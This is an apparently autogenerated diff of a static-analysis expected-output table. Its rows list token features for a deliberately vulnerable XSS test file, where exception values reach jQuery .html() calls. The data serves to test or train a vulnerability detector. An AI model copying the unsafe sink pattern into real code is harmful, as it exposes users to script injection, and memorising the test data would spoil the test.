autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:54:5:54:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:54:5:54:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:54:5:54:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18928,6 +128554,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:54:5:54:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:54:5:54:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:54:5:54:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:13:54:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:13:54:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:13:54:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:13:54:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:13:54:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:54:18:54:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:54:18:54:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:54:18:54:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18935,6 +128566,140 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:54:18:54:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:54:18:54:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:54:18:54:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:57:1 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:57:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:57:1 | this | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:57:1 | this | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:57:1 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | 'arguments' object of function safe | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | 'arguments' object of function safe | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | 'arguments' object of function safe | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | 'arguments' object of function safe | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | 'arguments' object of function safe | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | exceptional return of function safe | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | exceptional return of function safe | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | exceptional return of function safe | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | exceptional return of function safe | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | exceptional return of function safe | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | functio ... ar";\\n\\t} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | functio ... ar";\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | functio ... ar";\\n\\t} | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | functio ... ar";\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | functio ... ar";\\n\\t} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | return of function safe | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | return of function safe | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | return of function safe | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | return of function safe | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:2:59:2 | return of function safe | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:11:57:14 | safe | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:11:57:14 | safe | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:11:57:14 | safe | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:11:57:14 | safe | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:11:57:14 | safe | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:11:57:14 | safe | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:11:57:14 | safe | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:11:57:14 | safe | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:11:57:14 | safe | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:11:57:14 | safe | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:16:57:16 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:16:57:16 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:16:57:16 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:16:57:16 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:16:57:16 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:16:57:16 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:16:57:16 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:16:57:16 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:16:57:16 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:57:16:57:16 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:7:58:9 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:7:58:9 | foo | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:7:58:9 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:7:58:9 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:7:58:9 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:7:58:21 | foo = x + "bar" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:7:58:21 | foo = x + "bar" | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:7:58:21 | foo = x + "bar" | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:7:58:21 | foo = x + "bar" | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:7:58:21 | foo = x + "bar" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:13:58:13 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:13:58:13 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:13:58:13 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:13:58:13 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:13:58:13 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:13:58:13 | x | stringConcatenatedWith | -endpoint- 'bar' | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:13:58:21 | x + "bar" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:13:58:21 | x + "bar" | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:13:58:21 | x + "bar" | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:13:58:21 | x + "bar" | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:13:58:21 | x + "bar" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:17:58:21 | "bar" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:17:58:21 | "bar" | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:17:58:21 | "bar" | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:17:58:21 | "bar" | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:17:58:21 | "bar" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:58:17:58:21 | "bar" | stringConcatenatedWith | x -endpoint- | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:6 | safe | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:6 | safe | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:6 | safe | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:6 | safe | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:6 | safe | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:11 | exceptional return of safe(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:11 | exceptional return of safe(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:11 | exceptional return of safe(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:11 | exceptional return of safe(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:11 | exceptional return of safe(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:11 | safe(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:11 | safe(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:11 | safe(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:11 | safe(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:3:62:11 | safe(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:8:62:10 | foo | CalleeFlexibleAccessPath | safe | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:8:62:10 | foo | InputArgumentIndex | 0 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:8:62:10 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:8:62:10 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:8:62:10 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:8:62:10 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:62:8:62:10 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:63:11:63:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:63:11:63:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:63:11:63:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:63:11:63:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:63:11:63:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:63:11:63:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:63:11:63:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:63:11:63:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:63:11:63:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:63:11:63:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:11 | $('myId') | 